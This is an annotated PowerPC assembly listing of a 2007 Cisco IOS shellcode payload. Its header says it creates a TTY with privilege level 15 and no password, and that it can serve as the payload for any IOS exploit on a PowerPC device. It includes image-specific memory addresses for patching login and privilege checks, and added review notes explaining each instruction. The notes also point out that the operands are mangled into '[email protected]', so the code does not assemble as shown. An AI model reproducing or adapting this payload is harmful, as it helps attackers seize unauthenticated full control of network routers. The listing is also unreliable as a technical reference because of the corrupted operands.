# ----------------------------------------------------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a password
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following two hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
#
# Reading notes (added in review)
#
# Syntax: GNU as, PowerPC, bare register numbers (9 = r9, and so on).
#
# The listing is a payload, not a vulnerability: per the header above it only has an
# effect once some separate bug has already given an attacker code execution on the device.
#
# What the visible instructions do: two 32-bit stores (stw) to fixed addresses, then an
# indirect branch through CTR. Nothing in the listing writes to configuration or storage,
# so the change is presumably in-memory only and lost on reload -- TODO confirm.
#
# Every address is tied to the single image named in the header; on any other build the
# stores would land on unrelated memory.
#
# NOTE(review): the header speaks of "two hard-coded addresses", but four constants are
# defined below.
#
# NOTE(review): the operands printed as "[email protected]" are an artifact of an e-mail
# obfuscation filter that replaced the original operand text. They are left exactly as
# found, so the listing does not assemble as shown.
#
# ----------------------------------------------------------------------------------------
# Image-specific constants. Meanings are inferred from the names and from the
# "login patch" / "priv patch" / "exit code" markers below; the mangled operands no
# longer show which constant each instruction references.
.equ ret, 0x804a42e8        # presumably the address branched to by the exit code
.equ login, 0x8359b1f4      # presumably the word cleared by the login patch
.equ god, 0xff100000        # presumably the value written by the priv patch
.equ priv, 0x8359be64       # presumably the word overwritten by the priv patch
# ----------------------------------------------------------------------------------------
main:
# login patch begin
# Builds a 32-bit address in r9 from a high half (lis) and a low half (la), then
# stores a zero word at that address.
lis 9, [email protected]
la 9, [email protected](9)
li 8,0                      # r8 = 0, the word to be stored
stw 8, 0(9)                 # 32-bit store of r8 to the address held in r9
# login patch end
# priv patch begin
# Same address-building pattern twice: r9 receives the destination address and r8 the
# 32-bit value to store there.
lis 9, [email protected]
la 9, [email protected](9)
lis 8, [email protected]
la 8, [email protected](8)
stw 8, 0(9)                 # 32-bit store of r8 to the address held in r9
# priv patch end
# exit code
# Forms an address in r4 (high half via r10), copies it to CTR and branches there with
# link.
lis 10, [email protected]
addi 4, 10, [email protected]
mtctr 4                     # CTR = r4
bctrl                       # branch to CTR, return address saved in LR